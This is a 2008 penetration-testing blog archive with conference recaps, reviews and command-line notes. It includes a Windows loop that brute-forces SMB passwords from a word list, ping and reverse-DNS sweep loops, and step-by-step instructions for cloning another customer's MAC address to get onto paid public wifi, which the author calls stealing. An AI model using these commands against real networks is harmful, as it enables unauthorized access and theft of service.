carnal0wnage [Shared Reader]

Friday, February 29, 2008

"Penetration Testing Ninjitsu" with Ed Skoudis webcast

if you didnt catch it live you can watch the recorded version of “Penetration Testing Ninjitsu” with Ed Skoudis. it was pretty good and two more or lined up, next one is in April.

https://coresecurity.webex.com/coresecurity/lsr.php?AT=pb&SP=EC&rID=4214202&rKey=32920A3595EA5972

slides:

http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf

Here are my notes from listening/watching it

C:\> ipconfig /displaydns

**dumps the DNS cache, targets that have been recently resolved (may or may not be in the same network)

C:\> arp -a

**dumps the ARP Cache, so that should be boxes on the same subnet as the box you are on

**check to see if anything is in the hosts file, hardcoded IP to DNS

C:\> net use \\[target] [password] /u:[user]

**smb session

C:\> net use * \\[targetip]\[share] [password] /u:[user]

**attaches to the next available file share, you can also specify a drive letter

C:\> net user \\[targetip] /del or net use & /del

**can only have one SMB session with a given target machine as one USERNAME at a time, so you have to delete and so you can delete them all when done

FOR /L Loops --counters

C:\> for /L %i in ([start], [step], [stop]) do [command]

C:\> for /L %i in (1,1,255) do echo %i

**simple counter

C:\> for /L %i in (1,1,255) do echo %i & ping -n 5 127.0.0.1

**pauses 5 seconds between each iteration by using the ping command

**to do more than one command [command1] & [command2]
**run command1 and only run command2 if command1 succeeds [command1] && [command2]

C:\> for /L %i in (1,1,255) do @echo %i & @ping -n 5 127.0.0.1 > nul

**@ = dont display the command

** send errors to file [command] 2>>errorfile.txt

C:\> for /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"

**ping sweeper

nslookup [IPaddr]
**reverse lookup

C:\> for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 2>nul | find "Name"

**displays successful reverse lookups

C:\> for /L %i in (1,1,255) do @echo 10.10.10.%i: & @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

**shows IP and hostname if found

FOR /F Loops --files, strings, a file set's contents

C:\> for /f %i in (password.lst) do @echo %i & @net use \\[target_IP_addr] %i /u:[UserName] 2>nul && echo UserName: %i >>success.txt

** check slides for more examples

**scripting, .bat files

**you have to do double %% in bat files

C:\> for /L %i in (1,1,100) do @echo %i

**turns into

for /L %%i in (1,1,100) do @echo %%i

Thursday, February 28, 2008

Two Good Posts Over on Rational Survivability

Chris Hoff did two good posts over on Rational Survivability.

1: News Flash: If You Don't Follow Suggested Security Hardening Guidelines, Bad Things Can Happen...
http://rationalsecurity.typepad.com/blog/2008/02/news-flash-if-y.html

Not so interetested in the VM stuff, but the idea that the press sensationalizes security talks, like a GSM cracker for $1000.oo, technically correct but not quite right... is right on.

and

how most of these exploits require that the sun be lined up right, the checkbox that is not checked by default is checked (or unchecked), and the user clicks on the links on Wednesdays between 2:00-3:15pm.

2: McGovern's "Ten Mistakes That CIOs Consistently Make That Weaken Enterprise Security"http://rationalsecurity.typepad.com/blog/2008/02/mcgoverns-ten-m.html

Post on leadership mistakes that seem to happen all over, his own list is pretty good too. I posted a comment on what we can do about his #4:

Awareness initiatives are good for sexual harassment and copier training, not security

I did a blog post about that earlier, if users are broke then we need to start incorporating SE and owning users in our pentests as well as teaching kids about the dangers of the net and how to not be so gullible. We also need to make security training more than the "ok everyone time for annual security training...just click through the slides and print out your certificate..."

It really all boils down to you never get a free lunch. if you can instill and internalize that, you'll never get taken for one of those stupid scams. Of course if i find the girl that outed me on my "member" size its gonna be fight time.

Saturday, February 23, 2008

Near Real Time Book Writing

While not an interesting book topic for me, the concept of getting the public to help on the book is pretty cool.

These guys are basically writing a book on Software Craftsmanship: From Apprentice to Journeyman and allow people to comment on all the facets of the book. Not too much in the way of content that i can see, but an interesting idea.

http://softwarecraftsmanship.oreilly.com/wiki

http://www.oreillynet.com/fyi/blog/2008/02/collaborate_often_watch_it_gro.html

Hacking Exposed Windows 3rd ed Book Review

4 stars

Not bad for the 3rd iteration

Disclaimer: I received a review copy of HE:Windows.

The latest HE:Windows takes us toe to toe with Vista and Server 2008 and gives us a recap of some Win2k3 and Win2k knowledge. I was torn between whether to give this book three or four stars. I ended up giving it a four because it was well written, hit the majority objectives it laid out, and would be useful for someone that didn't have the two previous iterations, if you have the other two keep in mind there is a fair amount of content reuse and if you do this for a living, it may come up short of expectations.

The book covers a lot of ground but at the end I was left feeling like the authors were saying that if I was pentesting a Vista host or Server 2008 host/domain I should just call it quits. Going back and rereading a bit of the HE: Windows Server 2003 book I felt they said the same thing in that book as well. This obviously ended up being not the case, and I don't think will be the case with Vista and Server 2008 either. Its also not a viable option for any penetration tester.

Some examples of what I am talking about can be seen in Chapter 4 where the SMB enumeration examples only work against Windows 2000 and maybe Windows XP SP1. No mention of how to actually start pulling that information out from current environments. The Active Directory section reused the old content and made no discussion of any current tools or changes in 2003 environments and 2008 environments which have pretty much eliminated anonymous binds to extract information. Chapter 5, Hacking Windows Specific Services reused a lot of content which was disappointing, especially disappointing was the reuse of the smbrelay content, especially with tools that work much better like the smbrelay module in the metasploit framework.

The rootkit chapter is pretty good and talks about a rootkit I had never heard of (Unreal rootkit)..

Client side attacks has a decent update to it covering phishing, ActiveX, office and pdf exploits and a bit of cross site scripting, but refers you to the HE Web Applications book for more detail, which is fair.

Physical Attacks section is mostly the same with some updates on wireless, keyloggers and bootkits but mostly just overviews not followable steps.

Ch12 windows security features and tools is probably what pushed the book from a 3 to a 4. It covered bitlocker, Vista Windows integrity control, server hardening, stack protections, and others information.



Wednesday, February 20, 2008

Blackhat DC '08 Day1 wrapup

Holy crap, just when i was feeling a little blue after shmoocon (I felt the talks were better last year, but location was better this year), BlackHat cheers me up.

Dont get me wrong, there are some unfun things. The "con" area is super cramped, no room to even walk during the talk breaks, rooms were like 100 degrees today, lunch sucked cept for the super sleepy good cheesecake and the talk rooms were cramped in the popular talks. That aside the talks i caught today were great. Maybe i just picked poorly at shmoo, but i did good today.

Lets recap. schedule here if you want it

Cracking GSM: David Hulton and Steve

David only got 20 minutes at Shmoocon, so it was a chance for Steve to do all the GSM theory and David to go a little more into the cracking process. Things from my notes:

-They were able to see the IMSI from their phone in cleartext which is against the GSM standard, IMSI is basically your GSM phone's unique id.
-Every SIM has a JVM running on it and you can load and run code on there without user's knowlege, phone operators regularly send updates to phone and the user doesnt know.
-Your SIM stores the last 16 sessions IDs, so if an attacker can get physical access to your SIM and they have been recording the encrypted sessions they could potentially crack the last 16 calls or SMS, unless a phone operator is not cycling sessions IDs like they should.
-They built a GSM cracker, the commercial one was $1 Million USD, theres should be around $200k and crack a session key in 30 sec. the "cheap" one can be built for around 1500, you need 1 FPGA and 2 TB of tables, it will take about 30-60 min to crack a key for a recorded call or SMS. no real info on how to go about recording those calls but i imagine anyone that is thinking about buying one has figured out how to record the calls already.
-Links:
http://wiki.thc.org/gsm
http://picocomputing.com/

RFIDIOts!!!Practical RFID hacking (without soldering irons): Adam Laurie
Adam has given this talk a few times but i have never been able to see it, glad i went today.
Things from my notes:
-RFID chips are passive, the energy from the reader is what powers them up.
-two types; dumb and smart
-dumb= animal tags, door readers
-smart=smart cards, credit cards with chips, E-passports
-He did several cool demos reading and writing two different types of "dumb" RFID chips and showed reading his UK E-passport and talked about some of the issues with the implementation. very cool. code is available on the site and he sells RFID reader/writers on his site, the code (in python) is freely available.
-Links:
http://rfidiot.org/

Bad Sushi: Beating Phishers at their own game: Billy Rios & Nitesh Dhanjani
-They went into really good deatil about phishers, phishing kits, ATM Skimmers, really talking about the motivations and total lack of hiding what they are doing. I didnt take many notes but a really good talk. The most interesting part was how most of the phishing kits were "backdoored" where the mailer in the code would also send a copy to the orginial code author and how most of the people using the kits usually left it in there...cute.
-Links:
http://xs-sniper.com/blog/2008/01/28/bad-sushi-beating-phishers-at-their-own-game/
http://www.oreillynet.com/onlamp/blog/2008/01/bad_sushi_beating_the_phishers.html

URI Use and Abuse: Nathan McFeters & Rob Carter

What the F is a URI? Uniform Resource Identifier. still lost? how about "http://", "ftp://", "aim://", "trillian://", "mailto://"...allows for a browser to interact with programs, all URIs registered can be accessed via browswer
-XSS is possible
-RFC 4395 to see URI Schemes
-talked about different vulnerabilities, see links, using URIs on windows, mac, and linux
-Links
http://xs-sniper.com/blog/sploits-conferences-and-papers/
http://xs-sniper.com/blog/proving-ground/

Scanning Applications 2.0 - Next Generation Scan, Attacks and Tools: Sheeraj Shah
I really didnt take any notes because he covered SO MUCH in the talk. I've been trying to wrap my head around web2.0. It was definitely better to actually hear him talk through the slides even though he was a little hard to understand. obviously knows his web2.0 kung fu.
-i did go up after and ask Sheeraj about SQLI in Web2.0 apps. you basically have to feed all your SQLI thru wsdl requests which obviously makes current scanners worthless from a 2.0 look. but he did write a tool called WsFuzzer and you can feed it in whatever list of SQLI stings you want. so not totally automated, once you find the sql injection point you can automate the rest and you may or may not get any usable sql error messages back depending on the web service and backend database. Tons of demos of using the tools and some example ajax code on the BH disk, a very good added bonus.
-Links:
http://www.blueinfy.com/
http://www.blueinfy.com/tools.html
http://shreeraj.blogspot.com/

Other things of interest (maybe); I got to meet Richard Bejtlich of taosecurity, nice guy we talked for a minute after the phishing talk about user training versus technical fixes.

talked to the saint guy, they have added a pivot function to the tool, so you exploit a host and they have built into their shellcode a proxy type function that i can now user Saint's vuln or port scanner thru that connection into the internal lan without having to load any type of agent on the box like Core Impact does. pretty cool if it works, i'm gonna see if i can get a demo set up.

Tuesday, February 19, 2008

Blackhat DC '08

if anyone will be at BlackHat DC and wants to meet up give me a shout.

http://www.blackhat.com/html/bh-dc-08/bh-dc-08-main.html


-CG

Monday, February 18, 2008

Verizon Voyager First Thoughts

so it was time to get a new phone and we are unfortunately stuck with Verizon because the whole damn family is on verizon. given a choice i'd be with AT&T for their phone selection and network availability, anway... i had a blackberry 7130e, the one without the full keyboard. with verizon you have to have to pay an additional 40 bucks a month for blackberry data. Being the cheap ass that i am i decided to go with one of these other smart-ish phones since i cant have an iphone.

bring in the LG Voyager vx10000


its basically the enV with the touch front and a few other software options, the keyboard layout on the inside is the same. initial thoughts based on having a blackberry. its NOT push technology, i got the verizon premium stuff so unlimed text and data. it was easy to set up my carnal and learnsecurityonline email to be checked from it but you have to go an log into it, not have it pushed to you, acceptable just different.

to use the speakerphone you have to open the thing up and push the speaker button next to the CLR button. i dont care for the bluetool devices and usually use speakerphone when on the phone when i drive, so that's going to take some getting used to.

the touch screen on the front works ok, you get a little vibrate action for feedback, doesnt work so well when i use my thumb, better with fingers. which sucks because if you are a blackberry user you should have some mad thumb skills.

the VZnavigator (GPS) thing works ok, havent totally tried it out yet, easy to set up and get going, it told me i was at the house quickly.

the web browser has no java, so no google reader :-( thus far, i'm going to have to search for another solution to read blog stuff while on the road

the OS is the verizon/LG OS, no real opinions on this yet.

tethering the device to use the phone as the modem. you can supposedly change some options on the phone and essentially use the phone with a bluetooth adapter as an EVDO modem. suppsoedly violates your TOS and instructions vary based on firmware versions. i'm still looking for my bluetooth adapter to see how it works and looking a bit more on potential trouble. at the very worst it appears it is ok to use it on the "1x" network as a 14.4k modem, worst case you can download email thru it(if you have about a week of unused minutes)

didnt come with any type of holster, not even a ghetto one

bottom line is i'm keeping it (so far) and if/when i get the modem thing working i'll post back or if i decide it sucks and want to rant

Shmoocon 2008 (my $0.02)

So I missed day one of the con as I was stuck on planes and in airports for damn ages. After a few hours sleep I headed to DC to meet up with Chris and Joe and check out the presentations. Chris filled me in on H1kari's GSM presentation which sounded really cool. Gonna have to check that out.
I got to sit in on Jay Beale's "They're Hacking Our Clients!..." presentation. It was a repeat of the Toorcon talk and did not bring in much new material at all. Jay is a real sharp guy and a great presenter but he really was not talking about anything the folks listening did not already know. The user is the 'new' attack vector. He made good points and mentioned ideas for looking at user-agent strings from browsers, mail client identifiers and using those in conjunction with tools lie Squid to prevent access to mail or the web until the user patches. I believe the term is NAC. All Jay was proposing is a simple form of NAC. Still the method of implementation is not a bad idea but it's trivial to spoof user-agent strings to bypass that. Injecting iframes with mr-t into the user's brower once a day was also suggested. Not a bad way to detect third party plugins but what about when the user is on the road or at home?

I really want to see what happens when IT prevents a user from getting mail until he patches his computer. It seemed to me that the presentation forgot the fact the productivity trumps security every time. If what we do impacts a users ability to do perform their job we have failed at our job.

I'm not even going to comment on "Why are Databases so Hard to Secure" by Sheeri Cabral. She might be sharp and have DB knowledge but she really did not present well on what is an interesting topic. All I can remember is "ACLs are good".

Next up was "VoIP Penetration Testing: Lessons Learned" by John Kindervag and Jason Ostrom. This was an awesome talk. Great presenters and a really interesting topic. VLAN hopping with voiphopper! Damn cool and the did a live demo too! I can see sooo many networks getting owned with this! unplug phone, plug in laptop, own network!

At that point I was fried after no sleep and 24 hours of travel so I blew off the next talks and crashed in the hotel room for a few hours. Drinks and dinner with Chris and then hanging with Joe and talking up a storm. Lots of fun.

Today I got to see valsmiths and danny's talk on Malware Software Armoring Circumvention. All I can say is DAMN! Very, very cool stuff! Follow Chris's link below and check it out. Well worth it if you are into RCE at all.

I was really excited to see Josh Wright's and Brad Antoniewicz's presentation on attacking EAP implementations. I was not disappointed at all. A damn cool talk about a very cool topic. So many of my clients use PEAP, TTLS or another flavor of EAP and so I was really interested to see attacks against 802.1x implementations in action. They show how easy it is to capture credentials, either hashes in the case of ms-chapv1/2 or in plain text PAP credentials, simply using a rogue AP and a patched version of FreeRADIUS. A live demo too!

Chris and I ran into dre and Marcin. It was cool to put a face to the names. After that I had to run to a cab and head back to the train.

All in all it was a good con. It was definitely more about chilling with some friends and meeting new people.

dean

Sunday, February 17, 2008

Shmoocon 08 Day 3

alright Day3!

started the morning off right with coffee then off to Valsmith and Danny Quist talking about Malware Software Armoring Circumvention. very cool stuff and, for me, in that sit in a talk about things you dont know what much about. the offensive-computing.net guys built a tool (saffron) that can basically kick all these packer's asses and can allow you to unpack all different kinds of binaries that have been packed with different tools so you can disassemble them and do malware analysis.

Their slides and code are already up:
http://www.offensivecomputing.net/?q=node/637

keeping with the theme of stuff i that was above my skill level, next up was Vulncatcher: Fun with Vtrace and Programmatic Debugging by atlas. very cool talk on using some programmatic debugging to find vulnerabilities in different types of code and different types of data structures.
You can check out atlas' site for more info: http://atlas.r4780y.com/cgi-bin/atlas

He was also nice enough to do an interview with LSO after DEFCON:
http://www.learnsecurityonline.com/index.php?option=com_content&task=view&id=229&Itemid=46

Last up was dre and marcin from TS/SCI Security talking about Path X: Explosive Security Testing Tools using XPath. From their blog: "In this talk, we’ll discuss how using XPath can aid security testing during unit tests and in the integration phase of the software development lifecycle. By using XPath, it’s easier to share data between both open source and commercial quality testing, source code analysis tools and web application scanners."

http://www.tssci-security.com/archives/2008/02/17/path-x-explosive-security-testing/

After that I had to bug out, get home, and get ready for the week. thanks again to Don for the ticket!

Shmoocon 08 Day 2

Ok, i got up a little late and it took the spouse a min or two to get me to the metro, then the metro was doing work on one of the tracks, suffice to say i was late, i got there for noon talks, i tried to get a hotel room friday nite but no dice, did get on saturday nite so i didnt have to deal with the metro crap.

Day2

started with Jay Beale's They're Hacking Our Clients! Why are We Focusing Only on the Servers" talk. it didnt seem any different that the slides from toorcon. The jist is that we should incorporate client side testing into pen tests, because that's how people are getting in now and that we shouldnt allow customers to cop out and say "we have a user education program so no attacking the clients." He then went on to talk about some VA stuff like checking squid logs for clients on your network that are running vulnerable versions of apps like browsers or mail clients. You would then blackhole those guys off until patches were applied. I'll let Dean vent the most on that, because he raised the great point of if you blackhole some mucky muck's laptop and tell them to patch their box you're gonna get you ass fired up especially since its usually IT's job to patch stuff and most users dont have permissions to even update stuff most of the time.

next up was Why are Databases so Hard to Secure by Sheeri Cabral, i rolled in late and must have missed the good stuff because by the time i got in there i just saw a bunch of SQL in there and some talk about how developers should do something or the other...meh

after that was VoIP Penetration Testing: Lessons Learned by John Kindervag and Jason Ostrom for me the best talk of the day. they talked about some features they added to voiphopper. If you have seen the security focus article on VoIP hacking they just added to that. it was good though.

Got Citrix? Hack It! by Shanit Gupta talked about different ways to break out of Citrix apps to get command shells, IE boxes, or explorer boxes. pretty neat.

Advanced Protocol Fuzzing - What We Learned when Bringing Layer2 Logic to "SPIKE Land"
by Enno Rey and Daniel Mende. I'm a big believer in listening to a few talks at a con that are above your skill level so you can rise up to that. i'm not an exploit-dev guy, i wish i was so i took the opportunity to listen to the layer 2 fuzzing talk. enno and daniel basically modifed SPIKE to fuzz layer 2 cisco protocol like DTP, VTP, MLPS and two others i dont remember. no exploitation, but they were able to get some "fun" reactions from different cisco products.

talked some way cool wireless stuff with one of the intelguardians. He showed me wi-spy and zigbee and talked about the cool things in the future that could be done against zigbee type products.

didnt make the shmoo party, had dinner with dean and talked about the talks and some other projects we got working then hung out, had beers, and talked SQLI with j0e and dean.

Saturday, February 16, 2008

Shmoocon 08 Day 1

hard to believe a year has gone by since the last shmoocon, but it has, here is a quick recap of Day1.

Day 1 started out really good.
Here is the schedule: http://www.shmoocon.org/schedule.html

probably the coolest talk that i caught was H1kari's on cracking GSM A 5/1 Traffic. him and his company essentially built a monster GSM session hash generator and cracker. its currently creating the tables (2 more months to go) and they built a high horsepower lookup computer too all using pico/FPGA cards. really really cool. a little expensive for the average "hacker" but a neat project. The impact is that with their cracker they will be able to crack the session key in about 30 seconds and at that point can intercept and listen to calls over the GSM network. not a whole ton of details on how all that "could" work but i'm sure they have it figured out.

I missed most of the other talks except for the phishing one, which was basically about a guy that did an unauthorized phishing training awareness webpage and campaign and how he did it, nothing spectacular.

There were tons of cool people running around, some of the guys from the chicago 2600 were there, Muts and the BackTrack/off-sec guys were there, met Chris Hoff (rational security), Ed, Jay and all the intelguardians, the hak5 guys recorded a show live, the guys from Iron::Guard security were there, of course Joe from LearnSecurityOnline, great networking going on which is always a big part of the con experience.

Hit up some of the vendors, the coolest vendor i talked to was the Blue Coat guys. Blue Coat is a proxy that basically does an authorized MITM of all the traffic entering and leaving your network, the big thing with that is that it can do SSL on the fly and allow you to stick a device in the middle and check out the traffic flying by, it also will check to make sure that the protocols are matching up so it will verify for you that if data is leaving your network on 21 or 80 that that traffic really is ftp traffic or http traffic instead of someone just using those allowed outbound ports to do evil things. pretty neat.

Anyway, talks I want to catch tomorrow will be Jay Beale's Client Side Penetration talk, the two SIP talks and probably the Citrix talk.

thanks again Don from EthicalHacker.net for letting me cover the event aka bought my ticket :-)

Monday, February 11, 2008

Reliable Local Root since 2006?

now that's just friggin sweet...

http://blog.eonsec.com/2008/02/reliable-root-since-2006.html

client side attacks and technical solutions -- is it always a technical solution?

After talking to my buddy Joe about some client side attacks he came out with the "what is the technical remediation?" question.

It seems the last few years have been about the technical remediation for a non technical problem (exploiting users) delivered over a technical medium (internet/email). The remediation usually is to patch the flaw, in IE or yahoo or third party piece of crap X,Y or Z. At what point are we going to start addressing the reason for client side exploits and why they work so well...the client.

Let's face it, AV is pretty much worthless to anything custom and malicious, its going to be a long while before "Everyone" starts writing secure code, and even then chances are i can still get a user to load, click, run, do whatever i want with the right email sent to them. so is there a technical solution to it?

At some point you have to address underlying issues with problems (especially when they can be easily identified). The underlying issue is uneducated users clicking on things they should know better than to click on or downloading and running executables from god knows where.. User education is key and responsibility for actions is another and mostly just teaching is there is no "free lunch" in real life and there is certainly no free lunch on the internet. There is an awesome commercial on the TV about some dude trying to 419 scam on a bus and the people looking at them like WTF get the hell out of here, its a good commercial for internet safety and how ridiculous most phishing scams are when you take a second to really look at them.

Do i have a training program that will educate everyone? I wish, then i'd be getting paid alot more, but I will say that alot of place's user training programs that i have been exposed to are crap and lumped into all the other mandatory crap people have to do in a year. Think of it this way, you get 1 hour a year of IT Security training. now compare that to how much time the average user spends staring at the internet and email in a year. I'm not going to do the math but thats a very very small percentage of all the hours you work in a year, not even counting time spent on the internet at home.

So what's the point? The point is that the collective "we" need to stop allowing users to be click happy idiots on the browser or outlook inbox if we want to start actually working on fixing the client side piece. significant emotional events tend to make change in people, i'll leave the rest of that up to your imagination.

From ZDnet
Father of anti-virus says to invest in security awareness training

Thursday, February 7, 2008

Why "sticky" port security is dumb when your physical security sucks

If you havent heard of POPI Security... now you can:

P = Physical
O = Operational (OPSEC)
P = Personnel
I = Information(INFOSEC)

all that whiz bang pop a shell with metasploit and dump your mom's PII stuff falls into the "I" and they go up in order of ease, cost & complexity. For example, throwing a rock through a window and climbing into an office is in the "P" and cheap where a TEMPEST attack is in "I "and usually not cheap and requires a high degree of technical ability. Hopefully that makes sense.

Anyway, all that leads to the "no shit there I was" story of doing the onsite assessment. We roll in and get told there is "Sticky Port Security" on the switches. Begrudgingly we had given them our MAC addresses prior to the assessment so they could reserve us some IP space in the DHCP pool. So we set our IPs to the static ones they said we would have and nothing. A few phone calls later, still nothing.

Eventually we try plugging into empty network drops and setting things to DHCP, viola... IP address (not ones we were assigned) and connectivity. so much for port security, not much good when you leave hot open drops.

The "sticky" part of the security was a pain because we had 4 laptops and only 2 hot drops and the switch would only allow one IP per port. Thankfully, two networked printers were in the room, printing the printer's configuration (giving us its MAC) and SMAC for windows we had the other two laptops up and running. Yes, a simple 4 port router that clones MAC addresses would have worked too, but we didnt bring one.

Getting reverse shells back to our Linux hosts in VMware will be for another post, but we made it happen using VMware NATing & Fpipe.

Anyway, I mention physical security because:
1-we negated the port security by changing our MAC address and unplugging the printer from the network
2-because they didnt turn off ports that were unused we were handed IP addresses on the LAN
3-if the objective had been to just get "access" to the LAN we were done in 20 minutes
4-because of the open drops, 5 minutes and a wifi router and we could have had all the internal access we needed.

Just something to think about when you my smile smugly and tell people you have port security on your switches and your physical security sucks.

MAC address stealing for public wifi use Part 2

Mostly just notes for myself, but since Ubuntu can be a little tricky sometimes maybe they will help some other poor soul too...

**Like in the previous post said:
run airodump and see who is associated to the WAP you want to access, those MAC's that are associated with the IP have obviously paid (or hijacked someones shit like you are about to do)

**Actually doing it:
in the upper right with your wireless bars, right click and uncheck the wireless box

**Take the interface down so you can change the MAC
root@segfault:/home/cg# ifconfig ath0 down

**Change the MAC
root@segfault:/home/cg# ifconfig ath0 hw ether 00:06:25:27:55:EB

**Bring the interface back up
root@segfault:/home/cg# ifconfig ath0 up

**Check to see if the MAC took correctly
root@segfault:/home/cg# ifconfig ath0
ath0 Link encap:Ethernet HWaddr 00:06:25:27:55:EB
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:3278 errors:0 dropped:0 overruns:0 frame:0
TX packets:616 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:859916 (839.7 KB) TX bytes:86127 (84.1 KB)

Now, in the upper right where is probably a computer with a red X, right click and enable wireless, you should sync up and get an IP. at this point run wireshark and see if someone else is using your MAC and IP, if you are associated and cant actually get anywhere that is probably the problem. Pick another MAC address and redo the steps.

Tuesday, February 5, 2008

MAC address stealing for public wifi use

Keeping with my theme of "you never know when you need to crack WEP" or be able to get internet access...

If you find yourself in a life or death situation and its imperative that you get your lappy up on the net to send that "help me!" email and they are using MAC authentication, meaning only registered MACs can access the net, you can do the following:

pull out your trusty Ubiquiti or orinoco card or whatever you use and put it in monitor mode.

root@ineedhelp! #airmon-ng start wifi0

it will tell you what interface it started, for me and the ubiquiti card it was eth2

root@ineedhelp! #airodump-ng eth2

You should see something like the below:

BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:C0:02:3A:C4:32, 2008-02-03 17:46:43, 2008-02-03 17:47:03, 11, 54, OPN , , , 2, 11, 5, 172. 16. 17. 42, 9, INTESA9-A,
00:C0:02:3A:AF:0E, 2008-02-03 17:46:41, 2008-02-03 17:47:07, 11, 54, OPN , , , 1, 11, 12, 172. 16. 16.225, 8, INTESA15,
00:02:2D:AB:1D:4E, 2008-02-03 17:46:40, 2008-02-03 17:47:10, 4, 11, OPN , , , 7, 26, 72, 172. 16. 16. 76, 8, INTESA13,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:12:17:72:5F:18, 2008-02-03 17:46:41, 2008-02-03 17:47:09, -1, 36, 00:02:2D:AB:1D:4E,
00:12:17:98:00:C5, 2008-02-03 17:46:44, 2008-02-03 17:46:58, -1, 3, 00:02:2D:AB:1D:4E,
00:12:17:97:D8:2D, 2008-02-03 17:46:46, 2008-02-03 17:46:46, -1, 1, 00:02:2D:AB:1D:4E,
00:12:17:98:39:6F, 2008-02-03 17:46:50, 2008-02-03 17:46:50, -1, 1, 00:02:2D:AB:1D:4E,
00:06:25:27:55:EB, 2008-02-03 17:46:47, 2008-02-03 17:46:59, 8, 4, 00:C0:02:3A:AF:0E,
00:12:17:A4:65:45, 2008-02-03 17:46:56, 2008-02-03 17:47:06, 12, 4, 00:02:2D:AB:1D:4E, INTESA13
00:12:17:98:2B:6F, 2008-02-03 17:46:48, 2008-02-03 17:46:50, 11, 2, (not associated) , INTESA9-A
00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,
00:12:17:98:2B:6E, 2008-02-03 17:47:00, 2008-02-03 17:47:01, 0, 2, (not associated) , INTESA10

Go ahead and pick someone associated, thats going to be a valid MAC address for you to steal....er borrow.

00:12:17:98:44:4B, 2008-02-03 17:46:40, 2008-02-03 17:47:02, 9, 8, 00:02:2D:AB:1D:4E,

00:12:17:98:44:4B <-- Client MAC

00:02:2D:AB:1D:4E <-- WAP MAC

from there its a simple:

root@ineedhelp! #ifconfig eth2 down
root@ineedhelp! #ifconfig eth2 hw ether 00:12:17:98:44:4B
root@ineedhelp! #ifconfig eth2 up

now you should be handed a valid IP

root@ineedhelp! #ifconfig eth2
eth2 Link encap:Ethernet HWaddr 00:12:17:98:44:4B
inet addr:172.16.16.56 Bcast:172.16.16.255 Mask:255.255.255.0
inet6 addr: fe80::a800:4ff:fe00:a04/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:188860 errors:1128 dropped:1128 overruns:0 frame:1128
TX packets:65680 errors:1183 dropped:1 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:44299003 (42.2 MB) TX bytes:11928926 (11.3 MB)
Interrupt:3 Base address:0x5100

now you can send your emergency email, make that emergency blog post, or just search the net for the answer to your emergency...